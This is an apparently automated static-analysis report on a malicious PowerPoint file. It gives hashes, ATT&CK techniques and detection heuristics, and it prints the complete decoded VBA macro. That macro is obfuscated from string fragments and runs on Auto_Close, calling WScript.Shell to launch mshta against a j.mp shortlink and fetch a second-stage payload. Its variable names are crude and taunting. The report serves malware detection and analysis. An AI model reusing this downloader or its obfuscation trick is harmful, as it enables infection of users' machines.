Malicious Office (OLE) / .PPT — malware analysis report

Static analysis result for SHA-256 611d0b9d3351d6fa…

MALICIOUS

Office (OLE) / .PPT

86.5 KB Created: 2020-08-04 21:46:59 Authoring application: Microsoft Office PowerPoint First seen: 2026-05-13
MD5: 0bb72a9b37c511306307c5042a88f80d SHA-1: b0bc88aaf2cc986bf8fa7c04266a8bb1e416d419 SHA-256: 611d0b9d3351d6faf479a1821b302e4c6daefd849e14531a58456eaa40db5246
Risk score: 108

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1203 Exploitation for Client Execution

The sample contains VBA macros triggered by the Auto_Close event. The macros assemble, from short string fragments, the URL 'http:// @j.mp/asasdaxaeeedxaskasddkaos' and the command string 'mshta '. `CreateObject` is used to instantiate a `WScript.Shell` object, whose `Exec` method then runs the assembled command with the URL as its argument, most likely to download and execute a second-stage payload. The combination of `CreateObject` and shell execution from an auto-executing macro indicates malicious intent to compromise the system.

Heuristics (4)

  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    CreateObject(hireme).Exec suckmydickfornoreason10 + suckmydickfornoreason11
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Auto_Close macro low OLE_VBA_AUTOCLOSE
    Auto_Close macro
    Matched line in script
    Auto_CloSe()

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 1597 bytes
SHA-256: d9bc596f2bfb014eb66a4916e86ddb9b21176a6fe2cf3a7820b233bd299b8a0c
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ab1"
Function suckmydickfornoreason11()
suckmydickfornoreason6 = "h"
suckmydickfornoreason7 = "t"
suckmydickfornoreason8 = "t"
suckmydickfornoreason9 = "p://%20%20@j.mp/asasdaxaeeedxaskasddkaos"
antivirusarescam_6 = suckmydickfornoreason6
antivirusarescam_7 = suckmydickfornoreason7
antivirusarescam_8 = suckmydickfornoreason8
antivirusarescam_9 = suckmydickfornoreason9

suckmydickfornoreason11 = antivirusarescam_6 + antivirusarescam_7 + antivirusarescam_8 + antivirusarescam_9
End Function




Attribute VB_Name = "main"
Sub _
Auto_CloSe()
yari
End Sub

Attribute VB_Name = "ab2"
Function suckmydickfornoreason10()
suckmydickfornoreason1 = "m"
suckmydickfornoreason2 = "s"
suckmydickfornoreason3 = "h"
suckmydickfornoreason4 = "t"
suckmydickfornoreason5 = "a "
antivirusarescam_1 = suckmydickfornoreason1
antivirusarescam_2 = suckmydickfornoreason2
antivirusarescam_3 = suckmydickfornoreason3
antivirusarescam_4 = suckmydickfornoreason4
antivirusarescam_5 = suckmydickfornoreason5


suckmydickfornoreason10 = antivirusarescam_1 + antivirusarescam_2 + antivirusarescam_3 + antivirusarescam_4 + antivirusarescam_5

End Function



Attribute VB_Name = "po1"
Function hireme()
thisis = "WScr"
your = "ipt."
fucking = "She"
security = "ll"
iamhere = thisis
totellyou = your
yoursecurity = fucking
sucks = security
hireme = iamhere + totellyou + yoursecurity + sucks
End Function





Attribute VB_Name = "final"
Function yari()
CreateObject(hireme).Exec suckmydickfornoreason10 + suckmydickfornoreason11
End Function